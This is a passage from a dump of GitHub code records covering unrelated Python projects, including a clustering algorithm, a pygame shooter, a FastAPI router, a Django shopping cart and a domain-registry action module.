make_kids\n\n\n@dataclass\nclass Esfandiari:\n \"\"\"\"Solver for the k-median problem that uses the method proposed by Makarychev et al, that solves the\n k-median problem with an explainable 
solution.\"\"\"\n\n def __call__(self, instance, pre_clusters):\n \"\"\"\n Solve a k-median problem with the method proposed by Makarychev et al\n @param instance: instance of the k-median problem\n @return: an explainable solution to the k-median problem\n \"\"\"\n leaves, split_nodes = build_tree(instance, pre_clusters)\n\n return ExplainableOutput(instance, leaves, split_nodes, pre_clusters)\n\n\ndef build_tree(instance: Instance, pre_clusters: dict):\n dim = instance.dimension()\n X = instance.points\n u0 = ClusterNode(pre_clusters, np.array([[-inf, inf]] * dim), list(pre_clusters.keys())) # root\n leaves = []\n split_nodes = []\n\n def median_split(u: ClusterNode):\n if u.is_homogeneous():\n leaves.append(u)\n else:\n split_nodes.append(u)\n centers = u.set\n a = [min([center.coordinates[i] for center in centers]) for i in range(dim)]\n b = [max([center.coordinates[i] for center in centers]) for i in range(dim)]\n R = [a[i] - b[i] for i in range(dim)]\n probabilities = [R[i] / sum(R) for i in range(dim)]\n r = np.random.choice(np.arange(0, dim),\n p=probabilities) # np.random method needed for p argument!\n z = np.random.uniform(a[r], b[r])\n\n node_L, node_R = make_kids(u, r, z, True)\n u.children = [node_L, node_R]\n median_split(node_L)\n median_split(node_R)\n\n if not u0.is_homogeneous():\n median_split(u0)\n return leaves, split_nodes\n\n","repo_name":"EsmeeHuijten/explainable-clustering-algorithms","sub_path":"algorithms/Esfandiari_algorithm.py","file_name":"Esfandiari_algorithm.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"35739354150","text":"import os\nimport ntpath\nimport yaml\n\nfrom distutils import dir_util\nfrom distutils import file_util\n\nfrom skybase.utils import schema as schema_util\n\n\ndef set_indicators():\n global BOOL_TYPE_INDICATOR\n BOOL_TYPE_INDICATOR = \"CHANGE_ME[BOOL]\"\n global INT_TYPE_INDICATOR\n INT_TYPE_INDICATOR = \"CHANGE_ME[INT]\"\n global STR_TYPE_INDICATOR\n STR_TYPE_INDICATOR= \"CHANGE_ME[STRING]\"\n global STR_TYPE_OPTIONAL_INDICATOR\n STR_TYPE_OPTIONAL_INDICATOR= \"CHANGE_OR_REMOVE_ME[STRING]\"\n global LIST_TYPE_INDICATOR\n LIST_TYPE_INDICATOR = [\"CHANGE_OR_REMOVE_ME[LIST_ITEM]\", \"CHANGE_OR_REMOVE_ME[LIST_ITEM]\"]\n global DICT_KEY_TYPE_INDICATOR\n DICT_KEY_TYPE_INDICATOR = \"CHANGE_OR_REMOVE_ME[DICT_ITEM_KEY]\"\n global DICT_VALUE_TYPE_INDICATOR\n DICT_VALUE_TYPE_INDICATOR = \"CHANGE_OR_REMOVE_ME[DICT_ITEM_VALUE]\"\n\n global INDICATORS\n INDICATORS = [BOOL_TYPE_INDICATOR, INT_TYPE_INDICATOR, INT_TYPE_INDICATOR,\n STR_TYPE_INDICATOR, STR_TYPE_OPTIONAL_INDICATOR,\n DICT_KEY_TYPE_INDICATOR, DICT_VALUE_TYPE_INDICATOR]\n\n global REQUIRED_INDICATORS\n REQUIRED_INDICATORS = [BOOL_TYPE_INDICATOR, INT_TYPE_INDICATOR, INT_TYPE_INDICATOR,\n STR_TYPE_INDICATOR, DICT_KEY_TYPE_INDICATOR, DICT_VALUE_TYPE_INDICATOR]\n\n global LIST_TYPE\n LIST_TYPE = \"LIST\"\n\n\ndef get_schema(schema_name, operand):\n imported = getattr(__import__(\"skybase.schemas\", fromlist=[operand]), operand)\n if hasattr(imported, schema_name):\n return getattr(imported, schema_name)\n return []\n\n\ndef get_file_schema_name(filename):\n filename = os.path.basename(filename)\n return filename.replace('.', '_') + '_schema'\n\n\ndef create_dir_tree_from_schema(base_dir, operand, dry_run=False, force=False):\n result_string = \"\"\n for entry in get_schema(operand + \"_schema\", operand):\n dir_path = os.path.join(base_dir, \"/\".join(entry[0]))\n\n # create 
directories\n if not os.path.exists(dir_path):\n if dry_run:\n result_string += \"Directory \" + dir_path + \" would be created.\\n\"\n else:\n result_string += \"Creating directory \" + dir_path + \"\\n\"\n dir_util.mkpath(dir_path, dry_run=dry_run)\n\n # if a file is defined, create file\n for file in entry[1]:\n schema_attr = get_file_schema_name(file)\n file_schema = get_schema(schema_attr, operand)\n if file_schema:\n result_string += create_yaml_from_schema(os.path.join(dir_path, file), file_schema, operand,\n dry_run=dry_run, force=force)\n else:\n if dry_run:\n result_string += \"File \" + os.path.join(dir_path, file) + \" would be created:\\n\"\n result_string += \"#Blank \" + file + \" created by skybase\\n\"\n else:\n result_string += \"Creating file \" + os.path.join(dir_path, file) + \"\\n\"\n file_util.write_file(os.path.join(dir_path, file), \"#Blank \" + file + \" created by skybase\")\n return result_string\n\n\ndef create_yaml_from_schema(path, file_schema, operand, dry_run=False, force=False):\n result_string = \"\"\n content_index = 0\n if isinstance(file_schema[0], basestring):\n header = file_schema[0]\n content_index = 1\n content = file_schema[content_index:]\n content_dict = create_dict_from_schema(content, os.path.basename(path).split('.')[0], operand)\n\n noalias_dumper = yaml.dumper.SafeDumper\n noalias_dumper.ignore_aliases = lambda self, data: True\n noalias_dumper.add_representer(schema_util.UnsortableOrderedDict, yaml.representer.SafeRepresenter.represent_dict)\n\n if dry_run:\n result_string += \"File \" + path + \" would be created:\\n\"\n result_string += header + \"\\n\"\n result_string += yaml.dump(content_dict, allow_unicode=True, default_flow_style=False, Dumper=noalias_dumper)\n elif (not force) and os.path.exists(path):\n result_string += \"File \" + path + \" exists, use --force to override.\\n\"\n else:\n result_string += \"Creating file \" + path + \"\\n\"\n file_util.write_file(path, header + '\\n')\n with open(path, 'w') as temp_file:\n yaml.dump(content_dict, temp_file, allow_unicode=True, default_flow_style=False, Dumper=noalias_dumper)\n temp_file.close()\n return result_string\n\n\ndef create_dict_from_schema(content_schema, schema_attr_prefix, operand):\n dict = schema_util.UnsortableOrderedDict()\n for line in content_schema:\n key = line[0]\n val = line[1]\n\n if val and (val[0] == LIST_TYPE):\n schema_attr_prefix = schema_attr_prefix + '_' + key[-1]\n sub_schema_attr = schema_attr_prefix + '_yaml_schema'\n sub_dict = create_dict_from_schema(get_schema(sub_schema_attr, operand), schema_attr_prefix, operand)\n list = []\n list.append(sub_dict)\n line_dict = schema_util.rec_ordered_dict_from_list(key, list, True)\n else:\n line_dict = schema_util.rec_ordered_dict_from_list(key, val, False)\n\n dict = schema_util.rec_ordered_dict_merge(dict, line_dict)\n return dict\n\n\ndef create_unordered_dict_from_schema(content_schema, schema_attr_prefix, operand):\n dict = {}\n for line in content_schema:\n key = line[0]\n val = line[1]\n\n if val and (val[0] == LIST_TYPE):\n schema_attr_prefix = schema_attr_prefix + '_' + key[-1]\n sub_schema_attr = schema_attr_prefix + '_yaml_schema'\n sub_dict = create_dict_from_schema(get_schema(sub_schema_attr, operand), schema_attr_prefix, operand)\n list = []\n list.append(sub_dict)\n line_dict = schema_util.rec_dict_from_list(key, list, True)\n else:\n line_dict = schema_util.rec_dict_from_list(key, val, False)\n\n dict = schema_util.rec_dict_merge(dict, line_dict)\n return dict\n\n\ndef 
get_missing_paths_from_schema(base_dir, operand):\n dir_dict = {}\n root_dir = base_dir.rstrip(os.sep)\n start = root_dir.rfind(os.sep) + 1\n for path, dirs, files in os.walk(root_dir):\n folders = path[start:].split(os.sep)\n subdir = dict.fromkeys(files, True)\n parent = reduce(dict.get, folders[:-1], dir_dict)\n parent[folders[-1]] = subdir\n dir_dict = dir_dict[ntpath.basename(base_dir)]\n dir_schema = get_schema(operand + \"_schema\", operand)\n invalid = schema_util.verify_dict_from_schema(dir_dict, dir_schema)\n return [base_dir + '/' + s for s in invalid]\n\n\ndef validate_yaml_with_indicators(yaml_file):\n result = {\"valid\": True, \"result_string\": \"\"}\n with open(yaml_file, 'r') as temp_file:\n for line in temp_file:\n if any(s in line for s in REQUIRED_INDICATORS):\n result[\"valid\"] = False\n result[\"result_string\"] += \"Invalid value in \" + yaml_file + \", line:\" + line\n temp_file.close()\n return result\n\n\ndef validate_yaml_with_schema(yaml_file, operand):\n result = {\"valid\": True, \"result_string\": \"\"}\n if os.path.basename(yaml_file) != \"manifest.yaml\":\n if not validate_yaml_with_indicators(yaml_file)[\"valid\"]:\n result[\"valid\"] = False\n result[\"result_string\"] += validate_yaml_with_indicators(yaml_file)[\"result_string\"]\n return result\n with open(yaml_file, 'r') as temp_file:\n file_dict = {}\n try:\n file_dict = yaml.load(temp_file)\n except yaml.scanner.ScannerError:\n result[\"valid\"] = False\n result[\"result_string\"] += \"Invalid yaml syntax \" + yaml_file + '\\n'\n if file_dict:\n schema_attr_prefix = os.path.basename(yaml_file).split('.')[0]\n schema_dict = create_dict_from_schema(get_schema(get_file_schema_name(yaml_file), operand),\n schema_attr_prefix, operand)\n schema_dict = schema_util.UnsortableOrderedDict({key: value for key, value in schema_dict.items()\n if key is not '#'})\n if schema_dict:\n if not file_dict:\n result[\"valid\"] = False\n result[\"result_string\"] += \"No content in \" + yaml_file + '\\n'\n else:\n key_result = schema_util.verify_dict_keys(schema_dict, file_dict, yaml_file)\n if not key_result[\"valid\"]:\n result[\"valid\"] = False\n result[\"result_string\"] += key_result[\"result_string\"]\n temp_file.close()\n return result\n\n","repo_name":"markosys/skybase.io","sub_path":"skybase/schemas/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"26883914586","text":"# encoding=utf-8\nimport redis\nimport re\nimport pickle\nredis_cli = redis.StrictRedis()\nimport hashlib\nimport re\ndef get_md5(url):\n m = hashlib.md5()\n m.update(url)\n return m.hexdigest()\n\ndef extract_num(text):\n #从字符串中提取出数字\n match_re = re.match(\".*?(\\d+).*\", text)\n if match_re:\n nums = int(match_re.group(1))\n else:\n nums = 0\n\n return nums\n\ndef real_time_count(key, init):\n if redis_cli.get(key):\n count = pickle.loads(redis_cli.get(key))\n count = count + 1\n count = pickle.dumps(count)\n redis_cli.set(key, count)\n else:\n count = pickle.dumps(init)\n redis_cli.set(key, count)\n\ndef exclude_none(value):\n \"\"\"排除none值\"\"\"\n if value:\n return value\n else:\n value = \"无\"\n return value\n\ndef extract_num_include_dot(text):\n # 从包含,的字符串中提取出数字\n text_num = text.replace(',', '')\n try:\n nums = int(text_num)\n except:\n nums = -1\n return 
nums\n","repo_name":"acryboyhyj/search","sub_path":"Article/Article/util/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"20515573433","text":"import json\nimport os\n\npath = \"config/levels.json\"\nwith open(path, 'r') as lvls:\n levels = json.load(lvls)\n\n# level_names = [levels[level] for level in levels]\n# print(level_names)\n\n\ndef load_map(level_name):\n if level_name in levels.keys():\n return Level(levels[level_name])\n\n\nclass Level:\n def __init__(self, level_map):\n # load instance variables set to the values in the loaded dictionary for the level\n self.name = level_map['name']\n self.x_bound = level_map['x_bound']\n self.y_bound = level_map['y_bound']\n self.collisions = level_map['collisions']\n self.spawn = level_map['spawn_pos']\n self.spawn_x = self.spawn['x']\n self.spawn_y = self.spawn['y']\n\n","repo_name":"jakeperman/DungeonAdventure","sub_path":"old/level_load.py","file_name":"level_load.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"74062487134","text":"#the space war game created by jjjmmmsss aka james the great aka the rider aka the cruiser aka i love this one \"\"dab sun\"\" aka the sun of god aka i dont care aka i will forget you in minutes aka decision maker aka ...\r\nimport sys\r\nimport pygame\r\nimport random\r\nfrom math import*\r\npygame.init()\r\n\r\nscreen = pygame.display.set_mode((600,700))\r\nicon = pygame.image.load(\"images/space.png\")\r\npygame.display.set_caption(\"space fight\")\r\npygame.display.set_icon(icon)\r\nbackground = pygame.image.load(\"images/background.png\")\r\n\r\n\r\n#the random position of the enemy will going to appear \r\nen_posX = random.randrange(100,500)\r\nen_posY = 50\r\nthe_first_img = pygame.image.load(\"images/startbg.png\")\r\n#text\r\nscore = 0\r\ntext_posX = 0\r\ntext_posY = 0\r\ntext = pygame.font.Font(\"golden_metafor/Golden Metafor Regular.ttf\",24)\r\ndef the_win_start():\r\n global screen,the_first_img,text\r\n start = True\r\n while start:\r\n \r\n screen.blit(the_first_img,(0,0))\r\n score_s = text.render(\"Press s to start the game press q to quit\",True,(255,0,255))\r\n screen.blit(score_s,(20,300))\r\n for ev in pygame.event.get():\r\n if ev.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n \r\n if ev.type == pygame.KEYDOWN:\r\n if ev.key == pygame.K_s:\r\n main_fun()\r\n start = False\r\n \r\n if ev.key == pygame.K_q:\r\n pygame.quit()\r\n pygame.display.flip() \r\nclass player():\r\n def __init__(self):\r\n #player position and other settings\r\n self.player = pygame.image.load(\"images/player.png\")\r\n self.player_posX = 250\r\n self.player_posY = 580\r\n self.playerXchange = 0\r\n self.playerYchange = 0\r\n self.player_speed = 4\r\n#the player function where by it will be used to draw the player \r\n def player_fun(self):\r\n screen.blit(self.player,(self.player_posX,self.player_posY))\r\n \r\nclass enemy():\r\n def __init__(self):\r\n #enemy position and other settings\r\n self.enemy_posX = 250\r\n self.enemy_posY = 0\r\n self.enemyXchange = 50\r\n self.enemyYchange = 15\r\n self.enemy_speed = 5\r\n self.enemy_health = 9\r\n self.num_of_enemy = 5\r\n self.red = (255,0,0)\r\n self.rectenemy = pygame.Rect(self.enemy_posX + 17,self.enemy_posY + 5,65,94)\r\n self.hitbox = (self.enemy_posX +17,self.enemy_posY + 5,65,94)\r\n self.enemy = 
pygame.image.load(\"./images/enemy.png\")\r\n #the enemy function where by it will be used to draw the enemy\r\n def enemy_fun(self,x,y):\r\n screen.blit(self.enemy,(x,y))\r\n \r\n \r\nclass rocket():\r\n \r\n def __init__(self):\r\n #rocket of the player position, speed and other settings\r\n self.player_posX = 250\r\n self.player_posY = 580\r\n self.enemy_posX = 250\r\n self.enemy_posY = 0\r\n self.rocket_capacity = 1000\r\n self.rocket_speed = 10\r\n self.rocket_posY = self.player_posY\r\n self.rocket_posX = self.player_posX\r\n self.rocket_mode = \"ready\"\r\n self.red = (255,0,0)\r\n self.rocket_mode_enemy = \"fire\"\r\n self.rocket = pygame.image.load(\"images/rocket.png\")\r\n\r\n #the rocket function to blit rocket on a screen\r\n def rocket_fun(self,x,y):\r\n screen.blit(self.rocket,(x + 5,y - 2))\r\n\r\n\r\n\r\n\r\n#let put a function that will be used to write the scores\r\ndef score_fun(x,y,score):\r\n global text\r\n score_s = text.render(\"Score :\"+str(score),True,(255,255,255))\r\n screen.blit(score_s,(x,y))\r\n\r\n #gameover text\r\ndef game_over_fun(x,y):\r\n global text,score\r\n high_score =score\r\n game_over=text.render(\"GAME OVER /n /n /nYour High score : \"+str(high_score),True,(255,255,255))\r\n screen.blit(game_over,(x,y))\r\n \r\n#isscollision function is used to detect the collision of between rocket and enemy also used on enemy and player collison and other collision\r\ndef iscollision(enemy_posX,rocket_posX,enemy_posY,rocket_posY):\r\n global score\r\n collision=sqrt(pow((enemy_posX - rocket_posX),2) + pow((enemy_posY - rocket_posY),2))\r\n if collision <= 50:\r\n enemy.enemy_health -= 1\r\n score += 1\r\n \r\n return True\r\n else:\r\n return False\r\n\r\n\r\n\r\ndef callfunction():\r\n #function calls in while loop\r\n score_fun(text_posX,text_posY,score)\r\n player.player_fun()\r\n enemy.enemy_fun(enemy.enemy_posX,enemy.enemy_posY)\r\n score_fun(text_posX,text_posY,score) \r\n##we make the classes to a variable so that we can be able to use it as we define in the class method\r\nrocket = rocket() \r\nplayer = player()\r\nenemy = enemy()\r\n\r\n\r\n\r\n#the main game function\r\n\r\ndef main_fun():\r\n global score\r\n run=True\r\n\r\n while run:\r\n screen.blit(background,(0,0))\r\n \r\n \r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n sys.exit()\r\n \r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n player.playerXchange = -player.player_speed\r\n \r\n \r\n if event.key == pygame.K_RIGHT:\r\n player.playerXchange = player.player_speed\r\n \r\n \r\n if event.key == pygame.K_DOWN:\r\n player.playerYchange = player.player_speed\r\n \r\n \r\n \r\n if event.key == pygame.K_UP:\r\n player.playerYchange = -player.player_speed\r\n if event.key == pygame.K_SPACE:\r\n if rocket.rocket_mode == \"ready\":\r\n rocket.rocket_posY = player.player_posY\r\n rocket.rocket_posX = player.player_posX\r\n rocket.rocket_mode = \"fire\"\r\n rocket.rocket_fun(rocket.rocket_posX,rocket.rocket_posY)\r\n rocket.rocket_capacity -= 1\r\n \r\n \r\n \r\n if event.type == pygame.KEYUP:\r\n if event.type == pygame.K_LEFT or pygame.K_RIGHT or pygame.K_UP or pygame.K_DOWN:\r\n player.playerXchange = 0\r\n player.playerYchange = 0\r\n \r\n if event.type == pygame.K_SPACE:\r\n rocket.rocket_mode = \"ready\"\r\n \r\n \r\n \r\n \r\n player.player_posX += player.playerXchange\r\n player.player_posY += player.playerYchange\r\n \r\n \r\n enemy.enemy_posX += enemy.enemy_speed\r\n\r\n #rocket reset \r\n if 
rocket.rocket_mode == \"fire\":\r\n rocket.rocket_posY -= rocket.rocket_speed\r\n rocket.rocket_fun(rocket.rocket_posX,rocket.rocket_posY)\r\n if rocket.rocket_posY <= -58:\r\n rocket.rocket_mode = \"ready\"\r\n \r\n \r\n callfunction()\r\n \r\n\r\n #boundary of the enemy \r\n if enemy.enemy_posX >= 500:\r\n enemy.enemy_speed = -1\r\n enemy.enemy_posY += 15\r\n if enemy.enemy_posX <= -15:\r\n enemy.enemy_speed = 1\r\n enemy.enemy_posY += 15\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n #playerboundery\r\n if player.player_posX <= 0:\r\n player.player_posX = -1\r\n \r\n if player.player_posX >= 495:\r\n player.player_posX = 495\r\n if player.player_posY <= 0:\r\n player.player_posY = 0\r\n \r\n if player.player_posY >= 600:\r\n player.player_posY = 600\r\n \r\n \r\n \r\n #collission detection\r\n collision_rocket_enemy = iscollision(enemy.enemy_posX,rocket.rocket_posY,enemy.enemy_posY,rocket.rocket_posY)\r\n \r\n if collision_rocket_enemy:\r\n rocket.rocket_mode = \"ready\"\r\n rocket.rocket_posY = player.player_posY\r\n if enemy.enemy_health < 1:\r\n enemy.enemy_posX = 250\r\n enemy.enemy_posY = 0\r\n enemy.enemy_health = 9\r\n \r\n \r\n\r\n if enemy.enemy_health < 1:\r\n enemy.enemy_posX = 250\r\n enemy.enemy_posY = 0\r\n enemy.enemy_health = 9\r\n \r\n \r\n #the function to detect if enemy has collide with the player \r\n collision_player_enemy = iscollision(enemy.enemy_posX,player.player_posX,enemy.enemy_posY,player.player_posY)\r\n if collision_player_enemy:\r\n pygame.quit()\r\n quit()\r\n sys.exit()\r\n pygame.display.flip()\r\nthe_win_start()\r\nmain_fun()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"jasjastone/space-war","sub_path":"space fight.py","file_name":"space fight.py","file_ext":"py","file_size_in_byte":8858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"24275093402","text":"from typing import Optional\n\nimport torch\n\nfrom torch_extras.tied_linear import get_linear\nfrom .simple import SimpleLayerUnidirectional\n\nclass OutputUnidirectional(SimpleLayerUnidirectional):\n\n def __init__(self,\n input_size: int,\n vocabulary_size: int,\n shared_embeddings: Optional[torch.Tensor]=None,\n bias: bool=True\n ):\n super().__init__(get_linear(\n input_size,\n vocabulary_size,\n shared_embeddings,\n bias\n ))\n","repo_name":"bdusell/stack-attention","sub_path":"src/torch_unidirectional/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"33"} +{"seq_id":"42157643123","text":"#!/usr/bin/env python\n\nimport unittest\nfrom dominion import Game, Card, Piles\nimport dominion.CardPile as CardPile\n\n\n###############################################################################\nclass Card_Castles(Card.Card):\n def __init__(self):\n Card.Card.__init__(self)\n self.name = \"Castles\"\n self.base = Card.CardExpansion.EMPIRES\n\n @classmethod\n def cardpile_setup(cls, game):\n card_pile = CastleCardPile(game)\n return card_pile\n\n\n###############################################################################\nclass CastleCardPile(CardPile.CardPile):\n def __init__(self, game):\n self.mapping = game.get_card_classes(\"Castle\", game.paths[\"cards\"], \"Card_\")\n for name, class_ in self.mapping.items():\n game.card_instances[name] = class_()\n super().__init__()\n\n def init_cards(self, num_cards=0, card_class=None):\n self.cards = sorted(\n [_() 
for _ in self.mapping.values()], key=lambda x: x.cost, reverse=True\n )\n\n\n###############################################################################\nclass CastleCard(Card.Card):\n pass\n\n\n###############################################################################\nclass TestCastles(unittest.TestCase):\n def setUp(self):\n self.g = Game.TestGame(numplayers=1, initcards=[\"Castles\"])\n self.g.start_game()\n self.plr = self.g.player_list(0)\n self.card = self.g.get_card_from_pile(\"Castles\")\n self.plr.piles[Piles.HAND].set(\"Silver\", \"Gold\")\n self.plr.add_card(self.card, Piles.HAND)\n\n def test_castles(self):\n self.g.print_state()\n\n\n###############################################################################\nif __name__ == \"__main__\": # pragma: no cover\n unittest.main()\n\n# EOF\n","repo_name":"dwagon/pydominion","sub_path":"dominion/cards/Card_Castles.py","file_name":"Card_Castles.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"38561801590","text":"import mongoengine\n\nfrom pulp.plugins.util import misc\n\n\ndef find_units(units, pagination_size=50):\n \"\"\"\n Query for units matching the unit key fields of an iterable of ContentUnit objects.\n\n This requires that all the ContentUnit objects are of the same content type.\n\n :param units: Iterable of content units with the unit key fields specified.\n :type units: iterable of pulp.server.db.model.ContentUnit\n :param pagination_size: How large a page size to use when querying units.\n :type pagination_size: int (default 50)\n\n :returns: unit models that pulp already knows about.\n :rtype: Generator of pulp.server.db.model.ContentUnit\n \"\"\"\n # get the class from the first unit\n model_class = None\n\n for units_group in misc.paginate(units, pagination_size):\n q_object = mongoengine.Q()\n # Build a query for the units in this group\n for unit in units_group:\n if model_class is None:\n model_class = unit.__class__\n\n # Build the query for all the units, the | operator here\n # creates the equivalent of a mongo $or of all the unit keys\n unit_q_obj = mongoengine.Q(**unit.unit_key)\n q_object = q_object | unit_q_obj\n\n # Get this group of units\n query = model_class.objects(q_object)\n\n for found_unit in query:\n yield found_unit\n","repo_name":"zjhuntin/pulp","sub_path":"server/pulp/server/controllers/units.py","file_name":"units.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"33"} +{"seq_id":"42586762602","text":"d = {\n0: 'Zero',\n1: 'One',\n2: 'Two',\n3: 'Three',\n4: 'Four', \n5: 'Five', \n6: 'Six', \n7: 'Seven', \n8: 'Eight', \n9: 'Nine'}\ninp = int(input())\ns = ''\n\nrem = 0\nwhile(inp!=0):\n rem = inp%10\n s = (d[rem]+' ') + s\n inp = inp//10\n\nprint(s)","repo_name":"YadavAnurag/cp","sub_path":"extra/number-to-name.py","file_name":"number-to-name.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"37956818072","text":"from fastapi import APIRouter, Depends, status, Response\r\nfrom sqlalchemy.orm import Session\r\nfrom typing import List\r\nfrom legacyDB import db\r\nfrom . 
import schema, services\r\n\r\nrouter = APIRouter(tags=[\"Aspirations\"], prefix=\"/aspiration\")\r\n\r\n\r\n@router.post(\"/\", status_code=status.HTTP_201_CREATED)\r\nasync def create_new_aspiration(\r\n request: schema.Aspiration, database: Session = Depends(db.get_db)\r\n):\r\n new_aspiration = await services.new_aspiration_register(request, database)\r\n return new_aspiration\r\n\r\n\r\n@router.get(\"/\", response_model=List[schema.DisplayAspiration])\r\nasync def get_all_aspirations(\r\n database: Session = Depends(db.get_db),\r\n):\r\n return await services.all_aspirations(database)\r\n\r\n\r\n@router.get(\"/child\", response_model=List[schema.DisplayAspiration])\r\nasync def get_all_child_aspirations(\r\n database: Session = Depends(db.get_db),\r\n):\r\n return await services.all_child_aspirations(database)\r\n\r\n\r\n@router.get(\"/teen\", response_model=List[schema.DisplayAspiration])\r\nasync def get_all_teen_aspirations(\r\n database: Session = Depends(db.get_db),\r\n):\r\n return await services.all_teen_aspirations(database)\r\n\r\n\r\n@router.get(\"/adult\", response_model=List[schema.DisplayAspiration])\r\nasync def get_all_adult_aspirations(\r\n database: Session = Depends(db.get_db),\r\n):\r\n return await services.all_adult_aspirations(database)\r\n\r\n\r\n@router.get(\"/{aspiration_id}\", response_model=schema.DisplayAspiration)\r\nasync def get_aspiration_by_id(\r\n aspiration_id: int,\r\n database: Session = Depends(db.get_db),\r\n):\r\n return await services.get_aspiration_by_id(aspiration_id, database)\r\n\r\n\r\n@router.delete(\r\n \"/{aspiration_id}\", status_code=status.HTTP_204_NO_CONTENT, response_class=Response\r\n)\r\nasync def delete_aspiration_by_id(\r\n aspiration_id: int,\r\n database: Session = Depends(db.get_db),\r\n):\r\n return await services.delete_aspiration_by_id(aspiration_id, database)\r\n","repo_name":"kayrahbear/simslegacychallengeapp","sub_path":"legacyDB/aspirations/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"23368216220","text":"import json\n\nfrom django.http import HttpResponse\n\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\n\nfrom home.models import ShoppingCart, Course, ScheduleItemGroup\n\n@login_required\ndef shopping_cart(request):\n cart, created = ShoppingCart.objects.get_or_create(user=request.user)\n\n courses = cart.courses.all().order_by('course_id')\n\n groups = ScheduleItemGroup.objects.select_related(\n 'lecture','lab','tutorial'\n ).filter(course__in=courses, ).order_by('course')\n\n group_iter = iter(groups) \n\n course_list = []\n try:\n g = next(group_iter)\n except StopIteration:\n pass\n\n for course in courses:\n d = {\"course\":course}\n l = []\n try:\n while g.course == course:\n l.append(g)\n g = next(group_iter)\n except StopIteration:\n pass\n d[\"sections\"] = l\n course_list.append(d)\n\n context = {\"courses\":course_list}\n\n return render(request, \"shopping-cart/view.html\", context)\n\n@login_required\ndef remove(request):\n if request.POST:\n cart, created = ShoppingCart.objects.get_or_create(user=request.user)\n\n if not created:\n course = Course.objects.get(course_id=request.POST.get(\"course\"))\n\n cart.courses.remove(course)\n\n return get_cart_dict(cart)\n\n\ndef get_cart_dict(cart):\n courses = cart.courses.values('course_id', 'course_code', 'course_name')\n\n return 
HttpResponse(json.dumps(list(courses)), content_type=\"applicationn/json\")\n\n\n@login_required\ndef add(request):\n if request.POST:\n cart, created = ShoppingCart.objects.get_or_create(user=request.user)\n\n course = Course.objects.get(course_id=request.POST.get(\"course\"))\n\n cart.courses.add(course)\n cart.save()\n\n return get_cart_dict(cart)\n\n\n@login_required\ndef get_cart(request):\n if request.user.is_authenticated():\n cart, created = ShoppingCart.objects.get_or_create(user=request.user)\n\n return get_cart_dict(cart)\n \n","repo_name":"grodtron/SOEN341","sub_path":"home/shopping_cart.py","file_name":"shopping_cart.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"25513316456","text":"import sys\nimport argparse\n\nfrom librar import static, misc, registry, pdns, mysql\nfrom librar.mysql import sql_server as sql\nfrom librar.log import log, debug, init as log_init\nfrom mailer import spool_email\nfrom backend import backend_creator\n\nCOPY_DEL_DOM_COLS = [\n \"domain_id\", \"name\", \"user_id\", \"status_id\", \"auto_renew\", \"ns\", \"ds\", \"client_locks\", \"created_dt\", \"amended_dt\",\n \"expiry_dt\"\n]\n\n\ndef event_log(notes, action):\n mysql.event_log({\n \"event_type\": \"Action:\" + action[\"action\"],\n \"domain_id\": action[\"domain_id\"],\n \"user_id\": None,\n \"who_did_it\": \"action\",\n \"from_where\": \"localhost\",\n \"notes\": notes\n })\n\n\ndef flag_expired_domain(__, dom_db):\n pdns.delete_from_catalog(dom_db[\"name\"])\n sql.sql_update_one(\"domains\", {\"status_id\": static.STATUS_EXPIRED}, {\"domain_id\": dom_db[\"domain_id\"]})\n return backend_creator.make_job(\"dom/expired\", dom_db)\n\n\ndef order_cancel(act_db, dom_db):\n ok, order_db = sql.sql_select_one(\"orders\", {\"domain_id\": dom_db[\"domain_id\"], \"user_id\": dom_db[\"user_id\"]})\n if not ok or len(order_db) <= 0:\n return True\n sql.sql_delete(\"orders\", {\"domain_id\": dom_db[\"domain_id\"], \"user_id\": dom_db[\"user_id\"]})\n if order_db[\"order_type\"] == \"dom/create\":\n return delete_domain(act_db, dom_db)\n return True\n\n\ndef delete_domain(__, dom_db):\n sql.sql_delete(\"orders\", {\"domain_id\": dom_db[\"domain_id\"]})\n sql.sql_delete(\"actions\", {\"domain_id\": dom_db[\"domain_id\"]})\n sql.sql_delete_one(\"domains\", {\"domain_id\": dom_db[\"domain_id\"]})\n pdns.delete_zone(dom_db[\"name\"])\n\n if dom_db[\"status_id\"] == static.STATUS_WAITING_PAYMENT:\n del_dom_db = {col: dom_db[col] for col in COPY_DEL_DOM_COLS}\n del_dom_db[\"deleted_dt\"] = None\n sql.sql_insert(\"deleted_domains\", del_dom_db)\n\n return 